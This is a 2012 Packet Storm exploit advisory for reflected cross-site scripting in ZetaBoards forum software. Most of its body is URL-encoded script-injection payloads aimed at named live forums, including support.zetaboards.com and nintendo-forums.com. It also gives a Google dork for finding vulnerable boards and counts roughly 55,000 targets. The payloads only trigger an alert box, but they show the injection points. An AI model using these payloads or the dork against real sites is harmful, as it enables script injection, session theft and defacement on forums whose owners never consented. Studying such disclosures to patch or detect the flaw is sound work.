ZetaBoards Cross Site Scripting

2012-03-06T00:00:00
ID PACKETSTORM:110503
Type packetstorm
Reporter Sony
Modified 2012-03-06T00:00:00

Description

                                        
                                            `# Exploit Title: ZetaBoards Cross Site Scripting  
# Date: 6.03.2012  
# Author: Sony  
# Software Link: http://www.zetaboards.com/  
# Google Dorks: intext:Hosted for free by ZetaBoards  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html  
..................................................................  
  
Well, we have a multiple cross site scripting vulnerabilities on ZetaBoards.  
  
Who use ZetaBoards?  
  
http://www.zetaboards.com/directory/  
  
The ZetaBoards Forum Directory contains 55,882 boards. (c)  
  
Demo:  
  
http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG  
  
http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG  
  
http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG  
  
http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG  
  
http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG  
  
Video:  
  
http://www.youtube.com/watch?v=ZGvwY9z3ZYA  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`